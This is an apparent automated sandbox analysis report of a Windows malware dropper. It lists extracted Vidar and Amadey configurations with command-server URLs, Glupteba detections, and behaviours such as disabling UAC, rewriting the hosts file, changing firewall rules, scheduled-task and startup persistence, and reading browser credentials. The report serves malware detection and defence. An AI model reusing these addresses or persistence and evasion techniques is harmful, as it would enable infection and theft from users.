Analysis
-
max time kernel
263s -
max time network
337s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system -
submitted
13/10/2023, 04:07
Static task
static1
General
-
Target
28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe
-
Size
5.3MB
-
MD5
3e34a4079a28dd2da3595cda4b02b28f
-
SHA1
b0b3df4afb3d9714a551f9f1db8877e3bb248770
-
SHA256
28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5
-
SHA512
9e1b0bf3f00dec6774adb49f0126302c0e7726d3f38c044e4bc12505922cc4bb93e55d5a926a4309cd0f407b8c1314cc0f1670eeb1eb4b67c9fa2e1ae03d8df9
-
SSDEEP
49152:U7nubEiNrMdIyfN6RCZjKDvsbl6TT3kc40e4VOmCOVMhDkrda1oS3QZX+yav3Qwf:U3EJZalfT3x0byWYwE
Malware Config
Extracted
vidar
6
5a1fadccb27cfce506dba962fc85426d
https://steamcommunity.com/profiles/76561199560322242
https://t.me/cahalgo
-
profile_id_v2
5a1fadccb27cfce506dba962fc85426d
-
user_agent
Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0 uacq
Extracted
amadey
3.89
http://193.42.32.29/9bDc8sQ/index.php
-
install_dir
1ff8bec27e
-
install_file
nhdues.exe
-
strings_key
2efe1b48925e9abf268903d42284c46b
Signatures
-
Glupteba payload 14 IoCs
resource yara_rule behavioral2/memory/4064-161-0x0000000002E00000-0x00000000036EB000-memory.dmp family_glupteba behavioral2/memory/4064-183-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-200-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-219-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4064-264-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-277-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4064-354-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-358-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4064-381-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-384-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4064-392-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-397-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/4064-411-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba behavioral2/memory/5012-414-0x0000000000400000-0x0000000000D1B000-memory.dmp family_glupteba -
Suspicious use of NtCreateUserProcessOtherParentProcess 22 IoCs
description pid Process procid_target PID 5016 created 3204 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 25 PID 5016 created 3204 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 25 PID 5016 created 3204 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 25 PID 5016 created 3204 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 25 PID 5016 created 3204 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 25 PID 5016 created 3204 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 25 PID 2084 created 3204 2084 updater.exe 25 PID 2084 created 3204 2084 updater.exe 25 PID 2084 created 3204 2084 updater.exe 25 PID 2084 created 3204 2084 updater.exe 25 PID 2084 created 3204 2084 updater.exe 25 PID 1016 created 3204 1016 conhost.exe 25 PID 1016 created 3204 1016 conhost.exe 25 PID 1016 created 3204 1016 conhost.exe 25 PID 1016 created 3204 1016 conhost.exe 25 PID 2084 created 3204 2084 updater.exe 25 PID 1016 created 3204 1016 conhost.exe 25 PID 1016 created 3204 1016 conhost.exe 25 PID 2780 created 3204 2780 updater.exe 25 PID 2780 created 3204 2780 updater.exe 25 PID 2780 created 3204 2780 updater.exe 25 PID 2780 created 3204 2780 updater.exe 25 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 3 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts x2sfuoqahzZ1uPAD6UOCLQ4o.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 904 netsh.exe 2692 netsh.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Drops startup file 9 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JmZSumXRRQhBNadtKwNGXlFb.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tmEMnGENYXHEKWWK6TIH3bQW.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZS7abNjJvDU1N38xJGukvT6K.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HdEtAoxWPwHJDKYRu6r0XndE.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6o3DYa2h8EptkG5KM51uT2In.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PlbReFgLN8HQOW9GYeKi75eB.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\23SGMyDT2g8YhdlyGPvb61Mh.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0Rm4tRAyn7sMnDnrZkUNNUGs.bat InstallUtil.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QF7qMkDyLjiGZo6PAdNQ1boh.bat InstallUtil.exe -
Executes dropped EXE 31 IoCs
pid Process 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 5012 rn6enq3Sejn0cjFjHZJ0n2A9.exe 5016 x2sfuoqahzZ1uPAD6UOCLQ4o.exe 4508 YfjcaqMeZJkgV91IIez0oMRl.exe 4064 Zs9u34rtGt6YlFISWM1itCcN.exe 3616 f0qRnAgqtZ9YKQTPPgHfpqoG.exe 2932 vtAyuNR3sRk30cmQP0sp8c0d.exe 4068 VeEnOaBeAblogsTl0jqBJENx.exe 4784 YfjcaqMeZJkgV91IIez0oMRl.tmp 3824 85dF8Pvye4bZ18FyCDaP1jhH.exe 4156 vtAyuNR3sRk30cmQP0sp8c0d.exe 4436 vtAyuNR3sRk30cmQP0sp8c0d.exe 2056 nhdues.exe 4760 vtAyuNR3sRk30cmQP0sp8c0d.exe 3120 _setup64.tmp 4552 vYtHCNIgfkioilWqZ4Zxypi9.exe 2208 Install.exe 872 Install.exe 2084 updater.exe 4420 DigitalPulseService.exe 3732 nhdues.exe 1296 Assistant_103.0.4928.25_Setup.exe_sfx.exe 3416 assistant_installer.exe 4152 assistant_installer.exe 4920 nhdues.exe 5104 QkjKqSF.exe 2780 updater.exe 1092 nhdues.exe 4864 XnjomcY.exe 2236 Zs9u34rtGt6YlFISWM1itCcN.exe 2888 rn6enq3Sejn0cjFjHZJ0n2A9.exe -
Loads dropped DLL 14 IoCs
pid Process 3200 vtAyuNR3sRk30cmQP0sp8c0d.exe 2932 vtAyuNR3sRk30cmQP0sp8c0d.exe 4156 vtAyuNR3sRk30cmQP0sp8c0d.exe 4436 vtAyuNR3sRk30cmQP0sp8c0d.exe 4760 vtAyuNR3sRk30cmQP0sp8c0d.exe 3616 f0qRnAgqtZ9YKQTPPgHfpqoG.exe 3616 f0qRnAgqtZ9YKQTPPgHfpqoG.exe 2020 rundll32.exe 3000 rundll32.exe 1228 rundll32.exe 3416 assistant_installer.exe 3416 assistant_installer.exe 4152 assistant_installer.exe 4152 assistant_installer.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000600000001af95-85.dat upx behavioral2/files/0x000600000001af95-104.dat upx behavioral2/files/0x000600000001af95-110.dat upx behavioral2/memory/3200-92-0x0000000000820000-0x0000000000D6D000-memory.dmp upx behavioral2/memory/2932-119-0x0000000000820000-0x0000000000D6D000-memory.dmp upx behavioral2/files/0x000600000001af95-128.dat upx behavioral2/files/0x000600000001afb8-139.dat upx behavioral2/files/0x000600000001af95-151.dat upx behavioral2/memory/4436-153-0x0000000000820000-0x0000000000D6D000-memory.dmp upx behavioral2/memory/4156-144-0x0000000000990000-0x0000000000EDD000-memory.dmp upx behavioral2/files/0x000600000001af95-189.dat upx behavioral2/memory/3200-193-0x0000000000820000-0x0000000000D6D000-memory.dmp upx behavioral2/memory/4760-221-0x0000000000820000-0x0000000000D6D000-memory.dmp upx behavioral2/memory/4436-237-0x0000000000820000-0x0000000000D6D000-memory.dmp upx -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows\CurrentVersion\Run\DigitalPulse = "\"C:\\Users\\Admin\\AppData\\Roaming\\DigitalPulse\\DigitalPulseService.exe\" 5333:::clickId=:::srcId=" YfjcaqMeZJkgV91IIez0oMRl.tmp -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 28e6b17dbc94ab578deb129913c5d938f1b4ef81ba9484009efa13be60c957a5.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini XnjomcY.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: vtAyuNR3sRk30cmQP0sp8c0d.exe File opened (read-only) \??\F: vtAyuNR3sRk30cmQP0sp8c0d.exe File opened (read-only) \??\D: vtAyuNR3sRk30cmQP0sp8c0d.exe File opened (read-only) \??\F: vtAyuNR3sRk30cmQP0sp8c0d.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 11 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol QkjKqSF.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini QkjKqSF.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 2084 set thread context of 1016 2084 updater.exe 182 PID 2084 set thread context of 5092 2084 updater.exe 203 -
Drops file in Program Files directory 7 IoCs
description ioc Process File created C:\Program Files (x86)\XFwIXNRxU\qIaowe.dll XnjomcY.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi XnjomcY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi XnjomcY.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XnjomcY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak XnjomcY.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja XnjomcY.exe File created C:\Program Files\Google\Chrome\updater.exe x2sfuoqahzZ1uPAD6UOCLQ4o.exe -
Drops file in Windows directory 3 IoCs
description ioc Process File created C:\Windows\Tasks\bbjfBeKuXNIWLGjFwD.job schtasks.exe File created C:\Windows\Tasks\RbhXETnRetCpgcxgd.job schtasks.exe File created C:\Windows\Tasks\CQGwpomRAqWvTFo.job schtasks.exe -
Launches sc.exe 15 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 780 sc.exe 3160 sc.exe 4628 sc.exe 3732 sc.exe 3472 sc.exe 4156 sc.exe 1028 sc.exe 2152 sc.exe 3068 sc.exe 520 sc.exe 4944 sc.exe 2076 sc.exe 3256 sc.exe 4972 sc.exe 1384 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString f0qRnAgqtZ9YKQTPPgHfpqoG.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 f0qRnAgqtZ9YKQTPPgHfpqoG.exe -
Creates scheduled task(s) 1 TTPs 18 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4996 schtasks.exe 4504 schtasks.exe 2888 schtasks.exe 3184 schtasks.exe 4256 schtasks.exe 448 schtasks.exe 1092 schtasks.exe 2368 schtasks.exe 5000 schtasks.exe 2660 schtasks.exe 2236 schtasks.exe 2112 schtasks.exe 4380 schtasks.exe 4748 schtasks.exe 5088 schtasks.exe 4128 schtasks.exe 2080 schtasks.exe 5104 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5084 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-512 = "Central Asia Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-451 = "Caucasus Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1661 = "Bahia Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-172 = "Central Standard Time (Mexico)" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-41 = "E. South America Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket XnjomcY.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" XnjomcY.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-352 = "FLE Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2161 = "Altai Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" Zs9u34rtGt6YlFISWM1itCcN.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" Zs9u34rtGt6YlFISWM1itCcN.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 vtAyuNR3sRk30cmQP0sp8c0d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e vtAyuNR3sRk30cmQP0sp8c0d.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 